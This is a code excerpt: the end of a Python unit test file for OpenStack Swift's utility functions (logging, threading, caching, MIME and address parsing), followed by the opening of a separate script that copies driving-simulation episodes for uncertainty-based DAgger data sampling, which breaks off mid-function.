self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEqual(b'\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
@reset_logger_state
def test_thread_locals(self):
logger = utils.get_logger(None)
# test the setter
logger.thread_locals = ('id', 'ip')
self.assertEqual(logger.thread_locals, ('id', 'ip'))
# reset
logger.thread_locals = (None, None)
self.assertEqual(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8'))
def test_no_fdatasync(self):
called = []
class NoFdatasync(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync(object):
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEqual(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEqual(called, [12345])
class TestThreadPool(unittest.TestCase):
def setUp(self):
self.tp = None
def tearDown(self):
if self.tp:
self.tp.terminate()
def _pipe_count(self):
# Counts the number of pipes that this process owns.
fd_dir = "/proc/%d/fd" % os.getpid()
def is_pipe(path):
try:
stat_result = os.stat(path)
return stat.S_ISFIFO(stat_result.st_mode)
except OSError:
return False
return len([fd for fd in os.listdir(fd_dir)
if is_pipe(os.path.join(fd_dir, fd))])
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.run_in_thread,
self._raise_valueerror)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_preserving_stack_trace_from_thread(self):
def gamma():
return 1 / 0 # ZeroDivisionError
def beta():
return gamma()
def alpha():
return beta()
tp = self.tp = utils.ThreadPool(1)
try:
tp.run_in_thread(alpha)
except ZeroDivisionError:
# NB: format is (filename, line number, function name, text)
tb_func = [elem[2] for elem
in traceback.extract_tb(sys.exc_info()[2])]
else:
self.fail("Expected ZeroDivisionError")
self.assertEqual(tb_func[-1], "gamma")
self.assertEqual(tb_func[-2], "beta")
self.assertEqual(tb_func[-3], "alpha")
# omit the middle; what's important is that the start and end are
# included, not the exact names of helper methods
self.assertEqual(tb_func[1], "run_in_thread")
self.assertEqual(tb_func[0], "test_preserving_stack_trace_from_thread")
def test_terminate(self):
initial_thread_count = threading.activeCount()
initial_pipe_count = self._pipe_count()
tp = utils.ThreadPool(4)
# do some work to ensure any lazy initialization happens
tp.run_in_thread(os.path.join, 'foo', 'bar')
tp.run_in_thread(os.path.join, 'baz', 'quux')
# 4 threads in the ThreadPool, plus one pipe for IPC; this also
# serves as a sanity check that we're actually allocating some
# resources to free later
self.assertEqual(initial_thread_count, threading.activeCount() - 4)
self.assertEqual(initial_pipe_count, self._pipe_count() - 2)
tp.terminate()
self.assertEqual(initial_thread_count, threading.activeCount())
self.assertEqual(initial_pipe_count, self._pipe_count())
def test_cant_run_after_terminate(self):
tp = utils.ThreadPool(0)
tp.terminate()
self.assertRaises(ThreadPoolDead, tp.run_in_thread, lambda: 1)
self.assertRaises(ThreadPoolDead, tp.force_run_in_thread, lambda: 1)
def test_double_terminate_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
tp.terminate()
tp = utils.ThreadPool(1)
tp.terminate()
tp.terminate()
def test_terminate_no_threads_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
class TestAuditLocationGenerator(unittest.TestCase):
def test_drive_tree_access(self):
orig_listdir = utils.listdir
def _mock_utils_listdir(path):
if 'bad_part' in path:
raise OSError(errno.EACCES)
elif 'bad_suffix' in path:
raise OSError(errno.EACCES)
elif 'bad_hash' in path:
raise OSError(errno.EACCES)
else:
return orig_listdir(path)
# Check Raise on Bad partition
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
obj_path = os.path.join(data, "bad_part")
with open(obj_path, "w"):
pass
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Suffix
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
obj_path = os.path.join(part1, "bad_suffix")
with open(obj_path, 'w'):
pass
suffix = os.path.join(part2, "suffix")
os.makedirs(suffix)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Hash
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
suffix = os.path.join(part1, "suffix")
os.makedirs(suffix)
hash1 = os.path.join(suffix, "hash1")
os.makedirs(hash1)
obj_path = os.path.join(suffix, "bad_hash")
with open(obj_path, 'w'):
pass
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
def test_non_dir_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_mount_check_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(2, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True
)
self.assertEqual(list(locations), [])
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
expected_objs = list()
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
# Create a file, that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
partition = os.path.join(data, "partition1")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition1'))
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj2.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition2'))
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
got_objs = list(locations)
self.assertEqual(len(got_objs), len(expected_objs))
self.assertEqual(sorted(got_objs), sorted(expected_objs))
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False, logger=logger
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in range(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in range(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.5), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
def test_waitfirst_only_returns_first(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
completed = []
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 'first')
pile.spawn(run_test, 'second')
pile.spawn(run_test, 'third')
self.assertEqual(pile.waitfirst(0.5), completed[0])
# 3 still completed, but only the first was returned.
self.assertEqual(3, len(completed))
def test_wait_with_firstn(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
for first_n in [None] + list(range(6)):
completed = []
pile = utils.GreenAsyncPile(10)
for i in range(10):
pile.spawn(run_test, i)
actual = pile._wait(1, first_n)
expected_n = first_n if first_n else 10
self.assertEqual(completed[:expected_n], actual)
self.assertEqual(10, len(completed))
def test_pending(self):
pile = utils.GreenAsyncPile(3)
self.assertEqual(0, pile._pending)
for repeats in range(2):
# repeat to verify that pending will go again up after going down
for i in range(4):
pile.spawn(lambda: i)
self.assertEqual(4, pile._pending)
for i in range(3, -1, -1):
next(pile)
self.assertEqual(i, pile._pending)
# sanity check - the pile is empty
self.assertRaises(StopIteration, pile.next)
# pending remains 0
self.assertEqual(0, pile._pending)
class TestLRUCache(unittest.TestCase):
def test_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
_orig_math_sqrt = math.sqrt
# setup cache [0-10)
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# update cache [10-20)
for i in range(10, 20):
self.assertEqual(math.sqrt(i), f(i))
# cache size is fixed
self.assertEqual(f.size(), 10)
# validate cache [10-20)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
for i in range(10):
self.assertRaises(TypeError, f, i)
# cache unchanged
self.assertEqual(f.size(), 10)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
def test_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
_orig_math_sqrt = math.sqrt
now = time.time()
the_future = now + 31
# setup cache [0-10)
with patch('time.time', lambda: now):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate expired [0-10)
with patch('math.sqrt', new=None):
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertRaises(TypeError, f, i)
# validate repopulates [0-10)
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
# reuses cache space
self.assertEqual(f.size(), 10)
def test_set_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
self.assertEqual(2, f(4))
self.assertEqual(1, f.size())
# expire everything
f.maxtime = -1
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
self.assertRaises(TypeError, f, 4)
def test_set_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
for i in range(12):
f(i)
self.assertEqual(f.size(), 10)
f.maxsize = 4
for i in range(12):
f(i)
self.assertEqual(f.size(), 4)
class TestParseContentRange(unittest.TestCase):
def test_good(self):
start, end, total = utils.parse_content_range("bytes 100-200/300")
self.assertEqual(start, 100)
self.assertEqual(end, 200)
self.assertEqual(total, 300)
def test_bad(self):
self.assertRaises(ValueError, utils.parse_content_range,
"100-300/500")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes 100-200/aardvark")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes bulbous-bouffant/4994801")
class TestParseContentDisposition(unittest.TestCase):
def test_basic_content_type(self):
name, attrs = utils.parse_content_disposition('text/plain')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {})
def test_content_type_with_charset(self):
name, attrs = utils.parse_content_disposition(
'text/plain; charset=UTF8')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {'charset': 'UTF8'})
def test_content_disposition(self):
name, attrs = utils.parse_content_disposition(
'form-data; name="somefile"; filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
def test_content_disposition_without_white_space(self):
name, attrs = utils.parse_content_disposition(
'form-data;name="somefile";filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
class TestIterMultipartMimeDocuments(unittest.TestCase):
def test_bad_start(self):
it = utils.iter_multipart_mime_documents(StringIO('blah'), 'unique')
exc = None
try:
next(it)
except MimeInvalid as err:
exc = err
self.assertTrue('invalid starting boundary' in str(exc))
self.assertTrue('--unique' in str(exc))
def test_empty(self):
it = utils.iter_multipart_mime_documents(StringIO('--unique'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), '')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic2(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_tiny_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(2), 'ab')
self.assertEqual(fp.read(2), 'cd')
self.assertEqual(fp.read(2), 'ef')
self.assertEqual(fp.read(2), 'g')
self.assertEqual(fp.read(2), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_big_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_leading_crlfs(self):
it = utils.iter_multipart_mime_documents(
StringIO('\r\n\r\n\r\n--unique\r\nabcdefg\r\n'
'--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
self.assertRaises(StopIteration, it.next)
def test_broken_mid_stream(self):
# We go ahead and accept whatever is sent instead of rejecting the
# whole request, in case the partial form is still useful.
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabc'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abc')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n'
'jkl\r\n\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline_with_tiny_chunks(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n'
'\r\njkl\r\n\r\n--unique--'),
'unique',
read_chunk_size=2)
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
class TestParseMimeHeaders(unittest.TestCase):
def test_parse_mime_headers(self):
doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size"
Foo: Bar
NOT-title-cAsED: quux
Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=
Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=
Latin-1: Resincronizaci\xf3n realizada con \xe9xito
Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80
This is the body
""")
headers = utils.parse_mime_headers(doc_file)
utf8 = u'\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440'
if six.PY2:
utf8 = utf8.encode('utf-8')
expected_headers = {
'Content-Disposition': 'form-data; name="file_size"',
'Foo': "Bar",
'Not-Title-Cased': "quux",
# Encoded-word or non-ASCII values are treated just like any other
# bytestring (at least for now)
'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=",
'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=",
'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito",
'Utf-8': utf8,
}
self.assertEqual(expected_headers, headers)
self.assertEqual(b"This is the body\n", doc_file.read())
class FakeResponse(object):
def __init__(self, status, headers, body):
self.status = status
self.headers = HeaderKeyDict(headers)
self.body = StringIO(body)
def getheader(self, header_name):
return str(self.headers.get(header_name, ''))
def getheaders(self):
return self.headers.items()
def read(self, length=None):
return self.body.read(length)
def readline(self, length=None):
return self.body.readline(length)
class TestDocumentItersToHTTPResponseBody(unittest.TestCase):
def test_no_parts(self):
body = utils.document_iters_to_http_response_body(
iter([]), 'dontcare',
multipart=False, logger=FakeLogger())
self.assertEqual(body, '')
def test_single_part(self):
body = "time flies like an arrow; fruit flies like a banana"
doc_iters = [{'part_iter': iter(StringIO(body).read, '')}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'dontcare',
multipart=False, logger=FakeLogger()))
self.assertEqual(resp_body, body)
def test_multiple_parts(self):
part1 = "two peanuts were walking down a railroad track"
part2 = "and one was a salted. ... peanut."
doc_iters = [{
'start_byte': 88,
'end_byte': 133,
'content_type': 'application/peanut',
'entity_length': 1024,
'part_iter': iter(StringIO(part1).read, ''),
}, {
'start_byte': 500,
'end_byte': 532,
'content_type': 'application/salted',
'entity_length': 1024,
'part_iter': iter(StringIO(part2).read, ''),
}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'boundaryboundary',
multipart=True, logger=FakeLogger()))
self.assertEqual(resp_body, (
"--boundaryboundary\r\n" +
# This is a little too strict; we don't actually care that the
# headers are in this order, but the test is much more legible
# this way.
"Content-Type: application/peanut\r\n" +
"Content-Range: bytes 88-133/1024\r\n" +
"\r\n" +
part1 + "\r\n" +
"--boundaryboundary\r\n"
"Content-Type: application/salted\r\n" +
"Content-Range: bytes 500-532/1024\r\n" +
"\r\n" +
part2 + "\r\n" +
"--boundaryboundary--"))
class TestPairs(unittest.TestCase):
def test_pairs(self):
items = [10, 20, 30, 40, 50, 60]
got_pairs = set(utils.pairs(items))
self.assertEqual(got_pairs,
set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60),
(20, 30), (20, 40), (20, 50), (20, 60),
(30, 40), (30, 50), (30, 60),
(40, 50), (40, 60),
(50, 60)]))
class TestSocketStringParser(unittest.TestCase):
def test_socket_string_parser(self):
default = 1337
addrs = [('1.2.3.4', '1.2.3.4', default),
('1.2.3.4:5000', '1.2.3.4', 5000),
('[dead:beef::1]', 'dead:beef::1', default),
('[dead:beef::1]:5000', 'dead:beef::1', 5000),
('example.com', 'example.com', default),
('example.com:5000', 'example.com', 5000),
('foo.1-2-3.bar.com:5000', 'foo.1-2-3.bar.com', 5000),
('1.2.3.4:10:20', None, None),
('dead:beef::1:5000', None, None)]
for addr, expected_host, expected_port in addrs:
if expected_host:
host, port = utils.parse_socket_string(addr, default)
self.assertEqual(expected_host, host)
self.assertEqual(expected_port, int(port))
else:
with self.assertRaises(ValueError):
utils.parse_socket_string(addr, default)
if __name__ == '__main__':
unittest.main()
|
filter_dagger_data_var.py
|
"""
Script for policy-based sampling using uncertainty estimate.
Uncertainty is measured by computing the variance in the predicted controls
of 100 runs of model with test time dropout
Requires:
var_file: computed variance in the controls with test time dropout
preload: npy preload file for the entire on-policy data
"""
import os
import sys
import time
import json
import shutil
import argparse
import multiprocessing
import numpy as np
def filter_episode(episode, episode_data):
if not os.path.isdir(os.path.join(args.target_dir, episode)):
os.mkdir(os.path.join(args.target_dir, episode))
files = sorted(os.listdir(os.path.join(args.source_dir, episode)))
if 'metadata.json' in files:
shutil.copy2(os.path.join(args.source_dir, episode, 'metadata.json'), os.path.join(args.target_dir, episode, 'metadata.json'))
if 'processed2' in files:
shutil.copy2(os.path.join(args.source_dir, episode, 'processed2'), os.path.join(args.target_dir, episode, 'processed2'))
for filename in episode_data:
episode_number = filename.split('_')[-1].split('.')[0]
central_image = os.path.join(args.source_dir, episode, 'CentralRGB_%s.png'%episode_number)
left_image = os.path.join(args.source_dir, episode, 'LeftRGB_%s.png'%episode_number)
right_image = os.path.join(args.source_dir, episode, 'RightRGB_%s.png'%episode_number)
shutil.copy2(central_image, os.path.join(args.target_dir, episode, 'CentralRGB_%s.png'%episode_number))
shutil.copy2(left_image, os.path.join(args.target_dir, episode, 'LeftRGB_%s.png'%episode_number))
shutil.copy2(right_image, os.path.join(args.target_dir, episode, 'RightRGB_%s.png'%episode_number))
measurements_file = os.path.join(args.source_dir, episode, 'measurements_%s.json'%episode_number)
shutil.copy2(measurements_file, os.path.join(args.target_dir, episode, 'measurements_%s.json'%episode_number))
# this function is used to get the sampled episodes in the first iteration
def get_required_episodes():
